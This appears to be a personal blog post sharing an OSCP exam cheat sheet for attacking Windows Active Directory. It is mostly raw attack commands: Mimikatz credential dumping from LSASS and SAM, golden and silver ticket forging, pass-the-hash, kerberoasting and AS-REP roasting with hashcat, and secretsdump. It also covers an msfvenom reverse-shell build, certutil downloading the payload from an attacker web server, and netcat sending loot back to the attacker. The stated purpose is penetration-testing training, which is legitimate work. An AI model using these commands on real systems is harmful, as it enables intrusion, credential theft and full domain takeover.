Do you struggle remembering the loads of different active directory attacks and enumeration vectors? Me too.. I’ll tell you a secret though: most penetration testers don’t remember everything off the top of their heads, they’re just really good at Googling things and usually have their own personal cheat sheets.
Essentially, this post is mostly going to be the clusterfuck of AD info I gathered while prepping for my OSCP exam. It doesn’t cover everything and anything related to AD, I don’t go into detail and explain every type of attack, I’m literally just pasting and reformatting the exact cheat sheet I used on my exam. This isn’t intended to be any sort of tutorial, just something that was (and is currently) helpful for me. Nothing I came across in the exam wasn’t on this sheet (did you like the double negative?). There’s no specific order to it, so I’d recommend taking it all and pasting it into your own OneNote or whatever you use and build off of it.
Quick disclaimer: any of the tools that are in the impacket directory can be ran as a binary rather than having to cd or specify their paths. i.e. instead of “/usr/share/doc/python3-impacket/examples/GetUserSPNs.py” you can just type “impacket-GetUserSPNs” and it should work. I can’t remember if I had to do tinkering to get it to work like that, I’m pretty sure it worked on a fresh install of Kali, so try it out.. If it doesn’t work let me know and I’ll see what I can do to help.
Most of the ‘good stuff’ that I use is in the last section — Remote AD Enumeration/Attacks.
Table of Contents
- Enumeration Cheat Sheets
- Attack Privilege Requirements
- Practicing AD Attacks
- MSFVenom Reverse Shell (.exe)
- File Transfer (From Target)
- Start PowerShell Session And Import Module
- Connect To Host w/ Found/Cracked Creds
- Remote AD Enumeration/Attacks
Enumeration Cheat Sheets
Attack Privilege Requirements
- Kerbrute Enumeration — No domain access required
- Pass the Ticket — Access as a user to the domain required
- Kerberoasting — Access as any user required
- AS-REP Roasting — Access as any user required
- Golden Ticket — Full domain compromise (Domain Admin) required
- Silver Ticket — Service hash required
- Skeleton Key — Full domain compromise (Domain Admin) required
Practicing AD Attacks
– HTB: Forest, Sauna, Active, Monteverde, Sizzle, Cascade
One of the best tools for AD enumeration. Use it in conjunction with SharpHound.exe on target to grab a visual representation of the domain. Also has some useful pre-built queries to identify the best path to Domain Admin, who is kerberoastable, etc.
SharpHound (exe or ps1) downloads:
[Attack Box] neo4j console [to start backend service] Enter creds [from initial setup] Transfer SharHound (exe or ps1) and nc.exe to target Run SharpHound.exe or .ps1 Transfer loot back to kali: - On $LHOST: nc -nlvp 4321 > loot.zip - On target: nc.exe -nv <kali IP> 4321 < loot.zip - Drag loot.zip into BloodHound GUI
Mimikatz.exe is a tool that allows you to extract passwords stored in memory and perform some AD attacks (PTT, etc). Obviously at least need a low-priv user, but it usually only works as an Administrator or SYSTEM. Just transfer it to target and run the binary.
Sometimes older systems require an older version of Mimikatz.exe, version 2.1.1:
Always start Mimikatz.exe session by entering:
When I run mimikatz I usually try to run most of the below commands, or at least will dump LSASS, dump SAM, and dump secrets.
Mimikatz.exe Cheat Sheet:
#Dump LSASS: mimikatz privilege::debug mimikatz token::elevate mimikatz sekurlsa::logonpasswords #(Over) Pass The Hash mimikatz privilege::debug mimikatz sekurlsa::pth /user:<UserName> /ntlm:<> /domain:<DomainFQDN> #List all available kerberos tickets in memory mimikatz sekurlsa::tickets #Dump local Terminal Services credentials mimikatz sekurlsa::tspkg #Dump and save LSASS in a file mimikatz sekurlsa::minidump c:\temp\lsass.dmp #List cached MasterKeys mimikatz sekurlsa::dpapi #List local Kerberos AES Keys mimikatz sekurlsa::ekeys #Dump SAM Database mimikatz lsadump::sam #Dump SECRETS Database mimikatz lsadump::secrets #Inject and dump the Domain Controller’s Credentials mimikatz privilege::debug mimikatz token::elevate mimikatz lsadump::lsa /inject #Dump the Domain’s Credentials without touching DC’s LSASS and also remotely mimikatz lsadump::dcsync /domain:<DomainFQDN> /all #List and Dump local kerberos credentials mimikatz kerberos::list /dump #Pass The Ticket mimikatz kerberos::ptt <PathToKirbiFile> #List TS/RDP sessions mimikatz ts::sessions #List Vault credentials mimikatz vault::list
PTT works by dumping the TGT from the LSASS memory of the machine. LSASS is a memory process that stores credentials on an active directory server and can store Kerberos tickets along with other credential types. When you dump the ticket with Mimikatz it will give you a .kirbi ticket which can be used to gain domain admin if a domain admin ticket is in LSASS memory. Great attack for privilege escalation and lateral movement.
mimikatz.exe privilege::debug sekurlsa::tickets /export [this will export all of the .kirbi tickets into your present working directory]
Always look for an administrator@krbtgt ticket if possible.
Now to pass the ticket:
kerberos::ptt <.kirbi ticket> klist [not in mimikatz session — verifies your ticket was injected]
Golden Ticket Attack:
This attack works by dumping the TGT of any user on the domain, this would preferably be a domain admin however for a golden ticket you would dump the krbtgt ticket and for a silver ticket you would dump any service or domain ticket.
mimikatz.exe privilege::debug lsadump::lsa /inject /name:krbtgt [to create a silver ticket change the /name: to dump the hash of either a domain admin account or a service account such as the SQLService account] kerberos::golden /user:administrator /domain:<domain.local> /sid:<krbtgt’s full SID> /krbtgt:<NTLM Hash of krbtgt> /id:500 [to create a silver ticket user a different service account — place the NTLM, SID, and id 1103 into the proper slots of this command]
To access other machines with the Golden/Silver ticket:
misc::cmd [to spawn cmd.exe instance for your new ticket] dir \\<other machine name or IP>\C$
MSFVenom Reverse Shell (.exe)
Nothing special to this. I just liked having it handy.
msfvenom -a x64 — platform Windows -p windows/x64/shell_reverse_tcp LHOST=<Local IP>LPORT=4321 -f exe -o rev.exe [If this doesn't work try windows/x64/shell/reverse_tcp as the payload; or remove x64 if it's a 32-bit box]
File Transfer (From Target)
On localhost, start webserver from location in which the file you want to transfer is in:
python3 -m http.server 8080
On target, enter this command:
certutil.exe -urlcache -split -f http://<your IP>:<web port>/<requested file> example: certutil.exe -urlcache -split -f http://126.96.36.199:8080/rev.exe
Start PowerShell Session And Import Module
powershell.exe -nop -exec bypass Import-Module <Full Path to xyz.ps1>
PowerView is a super powerful PowerShell script that helps with domain enumeration. Also can perform certain attacks like kerberoasting. It does too much to type. I’ll usually just follow some PowerView guides online.
Invoke-Kerberoast [Super nice when it works]
Connect To Host w/ Found/Cracked Creds
python3 /opt/impacket/examples/psexec.py <domain>/<username>:<password>@<IP> or impacket-psexec.py <domain>/<username>:<password>@<IP> example: impacket-psexec.py my.domain/luke:firstname.lastname@example.org
If you have creds/hashes to the target, use crackmapexec to request the reverse shell, and again to execute it.
For the first command, change the ‘rev.exe’ section in the picture below to:
certutil.exe -urlcache -split -f http://<localhost>:<web port>/rev.exe
then run your modified version of the command below (make sure you were hosting a web server for rev.exe, and make sure you have an nc listener for the shell):
Kerbrute is a popular enumeration tool used to brute force and enumerate valid active directory users by abusing Kerberos pre-authentication. I like to start username enumeration with the below wordlist, but hopefully I can grab legit usernames through LDAP enumeration or enum4linux. If so, I’ll create a user list based on those names and use kerbrute to verify they actually exist.
[Add DC (or hostname) DNS name and IP to /etc/hosts file] ./kerbrute userenum --dc <hostname.local> -d <domain name> <path to user-wordlist>
Good tool for harvesting TGTs and conducting various attacks. Transfer it to the target to run it.
Harvest TGTs every 30 seconds:
rubeus.exe harvest /interval:30
rubeus.exe kerberoast [copy the hash to your attack box into a file — we’ll call it hash.txt] hashcat -m 13100 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
Similar to kerberoasting, AS-REP roasting dumps the krbasrep5 hashes of user accounts that have Kerberos pre-authentication disabled. Unlike kerberoasting, these users do not have to be service accounts; the only requirement to be able to AS-REP roast a user is that the user must have pre-authentication disabled.
rubeus.exe asreproast /format:hashcat /outfile:<filename of choice> [save hash to file on attack box — we’ll call it hash.txt] hashcat -m 18200 hash.txt /usr/share/wordlists/rockyou.txt
Remote AD Enumeration/Attacks
This section is my bread and butter. 90% of the stuff I do/use comes from this section. It all boils to enumeration: use enum4linux/ldapsearch to initially see if you can find users/info, then put those users into a list and/or use kerbrute/impacket-lookupsid to find more/verify the found users, then just run through the rest of the commands and hope to get a hash back, crack it, then move onto the password-required tools, then re-run through all the tools as the new user/password. Pretty cut and dry.
Enumerate port 139/445 with enum4linux:
enum4linux -v <IP>
Enumerate LDAP w/ ldapsearch:
ldapsearch -x -h <IP> -s base namingcontexts
Parse through the returned naming contexts, then enumerate each one:
ldapsearch -x -h <IP> -b ‘DC=EGOTISTICAL-BANK,DC=LOCAL’
You can further query specific sections of each naming context:
ldapsearch -h <IP> -x -b “DC=cascade,DC=local” ‘(objectClass=person)’
Search through the output and see if you can identify interesting parameters. You may be able to create a user list based on the output. You might get lucky and find some sensitive info like passwords. Try piping the command grep and grepping for pass, pwd, password, domain, user, etc..
Enumerate users via Kerbrute:
[add domain name to /etc/hosts file] ./kerbrute userenum --dc <dc IP/hostname> -d <domain.local> <user list>
You can also enumerate users with crackmapexec’s –users option if you have creds.
If kerbrute doesn’t work, try impacket-lookupsid
impacket-lookupsid <domain.local>@<DC IP>
If you manual enumeration doesn’t get you a valid list of users try:
impacket-GetNPUsers <domain.local>/ -no-pass -usersfile <path to users list> -format hashcat [this command can also be used if you find valid creds, might get different results with creds] [paste hash into a file — users.txt] hashcat -m 18200 hash.txt /usr/share/wordlists/rockyou.txt
Dump password hashes a specific service account has access to (usually requires creds):
impacket-secretsdump <username>:<password>@<domain name or IP> -dc-ip <DC IP>
Use Evil-WinRM or win-pth to connect to host using PTH attack:
evil-winrm -i <IP> -u <user> -H <hash>
When using win-pth you have to append the blank LM hash to the beginning of the user’s hash, I’ll provide a link explaining this.
Blank LM hash (always the same) — Aad3b435b51404eeaad3b435b51404ee pth-winexe -U <domain>/<user>%<LM hash>:<user hash> //<IP> <command to run>
Example win-pth command:
pth-winexe -U svcorp/pete%aad3b435b51404eeaad3b435b51404ee:0f951bc4fdc5dfcd148161420b9c6207 //10.11.1.21 cmd.exe
Get User SPNs:
impacket-GetUserSPNs <IP or hostname>/<username>:<password> [add -request if SPN is found] [save hash and crack with hashcat] hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt
Decrypt Groups.xml cpassword:
If you find a file on a Windows box named Groups.xml, this is a Group Policy Preferences XML (GPP) file. gpp-decrypt will extract usernames and passwords from it and decrypt it.
python3 gpp-decrypt.py -f <groups.xml file> OR python3 gpp-decrypt.py -c <cpassword>
That’s it! AD exploitation is pretty simple once you get the hang of it. Having a cheat sheet makes life much easier. When you’re in a time crunch or are feeling brain dead this will make your life so much easier. Feel free to take this and do whatever you want. Add to it, take away from it, reformat it, I don’t care. Hope it helps!